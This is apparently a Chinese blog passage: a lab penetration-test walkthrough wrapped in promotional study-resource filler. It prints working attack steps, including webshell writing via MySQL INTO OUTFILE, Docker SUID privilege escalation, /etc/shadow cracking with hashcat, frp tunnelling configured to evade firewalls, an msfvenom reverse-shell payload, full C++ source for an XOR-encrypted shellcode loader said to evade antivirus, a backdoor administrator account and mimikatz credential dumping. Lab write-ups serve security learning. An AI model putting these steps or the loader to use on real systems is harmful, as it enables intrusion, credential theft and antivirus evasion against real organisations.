给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
exploit/linux/local/cve_2022_0995_watch_queue
exploit/linux/local/su_login
提不上去… 找一下flag,发现在/var/www
![](https://img-blog.csdnimg.cn/img_convert/b963073f685bbd25183166ba037cef53.png)
根据php里面的配置,数据库指向发现新的资产,利用账户密码去连接
![](https://img-blog.csdnimg.cn/img_convert/efb25db303125aef6f62586b11ebde3d.png)
用msf搭建socks代理:
![](https://img-blog.csdnimg.cn/img_convert/4d4e7b8ec7966bfddc3f6c03921573b0.png)
proxychains mysql -u admin -p -h 192.168.100.1
![](https://img-blog.csdnimg.cn/img_convert/10ed4b41a8dbd8e4a5ac996b2d24d2d1.png)
因为是默认页面就直接写入就好了:
select ‘<?php phpinfo()?>’ INTO OUTFILE ‘/var/www/html/test.php’;
![](https://img-blog.csdnimg.cn/img_convert/ccd1610176240a7564c8233af2c8906f.png)
执行命令上线,再操作一波:
![](https://img-blog.csdnimg.cn/img_convert/b4c2541122bf4d31e0dccc8975c6df1a.png)
上传到临时文件再赋予权限执行
![](https://img-blog.csdnimg.cn/img_convert/7b7d0594eaddbc565a49a97ff577a369.png)
用的kali集成的linpeas,内容比较多,这里已经提示了suid提权,找一下:
![](https://img-blog.csdnimg.cn/img_convert/248de72af08cfcd08223478000cc5327.png)
去https://gtfobins.github.io/gtfobins/docker/找到提权的向量:
sudo install -m =xs $(which docker) .
./docker run -v /:/mnt --rm -it alpine chroot /mnt sh
这里不是交互式的tty,所以失败了
![](https://img-blog.csdnimg.cn/img_convert/ab01225edda92755878a038fbc5abe5c.png)
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
提权也可以偷个懒,再次利用suggest模块exp提权:
![](https://img-blog.csdnimg.cn/img_convert/74b8437e6e00f0f20a3130c8b62ca387.png)
等待一会,即可上线,这里不得不说msf的提权真是强,特别在exp提权上,如果自己编译是会很多出错导致难以利用,互联网上的poc在不同环境都是有兼容性问题的,这里msf就已经考虑好了兼容性的问题:
![](https://img-blog.csdnimg.cn/img_convert/6715a286182a488131eb1e9b2c2c0ce4.png)
读取cat /etc/shadow密码破解(实战下还是有必要去破解一下的,因为很多单位用的密码都一样,只要能破解出明文,利用明文去横向将会显得非常重要):
![](https://img-blog.csdnimg.cn/img_convert/f203e5def53e5a25596dbf8a5d99df57.png)
利用hashcat破解:
hashcat -m 1800 -a 0 hash.txt rockyou.txt
对应的明文:
6 6 6Zs4KmlUsMiwVLy2y$V8S5G3q7tpBMZip8Iv/H6i5ctHVFf6.fS.HXBw9Kyv96Qbc2ZHzHlYHkaHm8A5toyMA3J53JU.dc6ZCjRxhjV1:linuxrulez
拿到密码登录验证一下:linux-admin
![](https://img-blog.csdnimg.cn/img_convert/906ac26dd97623e0607670c09aff2aa8.png)
对同网段下的ip进行扫描,发现新的资产:
![](https://img-blog.csdnimg.cn/img_convert/59a17bfcdf348d5bd453ae29fdc8d132.png)
整理一下扫描的信息,(从这里之后的图片因为重置了靶场与之前的ip已经改变,不过问题不大),10.200.108.35的机器名是PC-FILESRV01 ,10.200.108.30的机器名是DC-SRV01,扫描结果也显示了是域控Domain Controllers,10.200.108.31的机器名是S-SRV01,http://10.200.108.30:80
![](https://img-blog.csdnimg.cn/img_convert/38682c09c7bd040f6456d1554d152b30.png)
再次搭建代理,这里直接用frp,frp的稳定性人尽皆知,这里就贴一下经常使用配置就好了:
./frps -c frps.ini
[common]
bind_port = 7000
token = Yuzusoft
tls_enable = true
客户端配置,实战中启用tls可以绕过态势感知、防火墙的拦截:
[common]
token = Yuzusoft
disable_custom_tls_first_byte = true
server_addr = 127.0.0.1
server_port = 7000
tls_enable = true
[socks5]
remote_port = 5444
plugin = socks5
![](https://img-blog.csdnimg.cn/img_convert/06385c0ceee67efc38139f82e8975b62.png)
![](https://img-blog.csdnimg.cn/img_convert/5d12496ac3e4c2b1bdb5d56e8da9ba16.png)
搭建完毕就可以访问 http://10.200.108.31/ 了:
![](https://img-blog.csdnimg.cn/img_convert/19ee8bfec2d979dc58d92e7eaa022068.png)
不晓得为什么burp出了什么问题,忍一下用浏览器来抓包,不难看出这里有个重置密码的参数让人感兴趣:
![](https://img-blog.csdnimg.cn/img_convert/c39cd7130f86704d89adde3744b8ef3f.png)
爆破用户名失败之后我重新翻找了之前mysql的数据库,找到了gurag用户:
![](https://img-blog.csdnimg.cn/img_convert/8d3e1e82af8f8fe4004417dbb98c02d8.png)
抓包分析发现gurag的token其实已经返回在返回包,一个简单的逻辑漏洞:
![](https://img-blog.csdnimg.cn/img_convert/25835bf9f9c03ae3914b8adb0138ff5c.png)
之后带着这个token去访问之前的页面即可:
![](https://img-blog.csdnimg.cn/img_convert/d8465e69ffe0bd9e6dadbf589cdc23d9.png)
登录之后一个典型的前端过滤上传:
![](https://img-blog.csdnimg.cn/img_convert/7d1a3763fb0554abcd0d4c00fbad5632.png)
根据之前目录扫描的结果,应该在images目录下
![](https://img-blog.csdnimg.cn/img_convert/05e24ccaac6a720abd6ff7e646ef4196.png)
![](https://img-blog.csdnimg.cn/img_convert/e978372fca3f989d83e766391f742ad9.png)
果不其然,直接一波php上传Getshell,直接拿到system权限:
![](https://img-blog.csdnimg.cn/img_convert/fe7c275050b6cdf078776d9a5fa424f3.png)
拿着进程去棱角社区进程识别看看,果然有杀毒,不过欺负一下微软的杀毒还是很轻松的:
![](https://img-blog.csdnimg.cn/img_convert/f98d6dc6d62b7ad5beb395f60d8392d7.png)
生成木马,本来想用https,但是上不了线,只能用tcp了
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.31.41 LPORT=8888 -f raw -o test.txt
写了分离的shellcode加载器:
#include
#include
#include
#include <Windows.h>
char Key[7] = { ‘Y’, ‘U’, ‘Z’, ‘S’, ‘O’, ‘F’, ‘T’ };
// 解密函数
int keyLength = 7;
void decrypt(std::vector& encryptedData) {
int keyIndex = 0; // 初始密钥索引为0
for (size_t i = 0; i < encryptedData.size(); ++i) {
encryptedData[i] = encryptedData[i] ^ Key[keyIndex]; // 使用当前密钥进行异或解密
keyIndex = (keyIndex + 1) % keyLength; // 更新密钥索引,确保在0到6之间循环
}
}
int main() {
// 读取 shellcode 从本地已经加密的 log 文件
std::ifstream file("log.txt", std::ios::binary);
std::vector<unsigned char> shellcode;
if (file) {
file.seekg(0, std::ios::end);
size_t size = file.tellg();
shellcode.resize(size);
file.seekg(0, std::ios::beg);
file.read(reinterpret_cast<char*>(shellcode.data()), size);
file.close();
}
else {
std::cout << "open file fail" << std::endl;
return 1;
}
Sleep(35000);
decrypt(shellcode);
// 分配内存
LPVOID allocMem = VirtualAlloc(NULL, shellcode.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (allocMem == NULL) {
std::cout << "内存分配" << std::endl;
return 1;
}
// 将 shellcode 拷贝到分配的内存中
memcpy(allocMem, shellcode.data(), shellcode.size());
// 执行 shellcode
typedef void (*ShellcodeFunction)();
ShellcodeFunction func = (ShellcodeFunction)allocMem;
func();
// 释放内存
VirtualFree(allocMem, 0, MEM_RELEASE);
return 0;
}
shellcode加载器本地测试免杀通过了
![](https://img-blog.csdnimg.cn/img_convert/0c4de90de8309ce35dfdd831f998bcca.png)
成功上线:
![](https://img-blog.csdnimg.cn/img_convert/b91895f5ab6c5b6f21a1222e27c2a512.png)
传个vt看看,20/70,算了,能用就行:
![](https://img-blog.csdnimg.cn/img_convert/4083c1b9ea695483b9333d5b6d4cb183.png)
靶机一直没上线,可能是端口转发的问题,没办法了,虽然OPSEC原则上加用户是很糟糕的方法,但我这里还是加个用户登上去看看到底是怎么回事:
net user Yuzusoft XXMn9nJfUVEDx2Lk /add
net localgroup administrators Yuzusoft /add
![](https://img-blog.csdnimg.cn/img_convert/120998f29ca8997ec3e9c14b228354b0.png)
登上去才发现,好吧,这是一个经典错误,报了个dll未找到的错误(后来几天后同事提点发现是编译的问题):
![](https://img-blog.csdnimg.cn/img_convert/37af22a149c076336586fcd759e4d67a.png)
请原谅我直接在UI内部关掉杀毒,之前还写过python的加载器,结果虚拟机之前快照重置了,就不再这里浪费时间了:
![](https://img-blog.csdnimg.cn/img_convert/dc40bb1fc5d71c062d2888a8389c241d.png)
经过一点点时间,上传木马执行上线:
![](https://img-blog.csdnimg.cn/img_convert/bdae3d70e185a51793e6f3373c2f9780.png)
转储密码哈希:
load mimikatz
kiwi_cmd sekurlsa::logonpasswords
报错说32位的不能访问64位的进程:
![](https://img-blog.csdnimg.cn/img_convert/3a6849510600c222efc001056aac33fd.png)
这里得找个64位的进程迁移过去
migrate xxxx
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
***93道网络安全面试题***
![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)
![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)
![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)
内容实在太多,不一一截图了
### 黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
😝朋友们如果有需要的话,可以联系领取~
#### 1️⃣零基础入门
##### ① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)
##### ② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)
#### 2️⃣视频配套工具&国内外网安书籍、文档
##### ① 工具
![](https://img-blog.csdnimg.cn/img_convert/d3f08d9a26927e48b1332a38401b3369.png#pic_center)
##### ② 视频
![image1](https://img-blog.csdnimg.cn/img_convert/f18acc028dc224b7ace77f2e260ba222.png#pic_center)
##### ③ 书籍
![image2](https://img-blog.csdnimg.cn/img_convert/769b7e13b39771b3a6e4397753dab12e.png#pic_center)
资源较为敏感,未展示全面,需要的最下面获取
![在这里插入图片描述](https://img-blog.csdnimg.cn/e4f9ac066e8c485f8407a99619f9c5b5.png#pic_center)![在这里插入图片描述](https://img-blog.csdnimg.cn/111f5462e7df433b981dc2430bb9ad39.png#pic_center)
##### ② 简历模板
![在这里插入图片描述](https://img-blog.csdnimg.cn/504b8be96bfa4dfb8befc2af49aabfa2.png#pic_center)
**因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆**
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**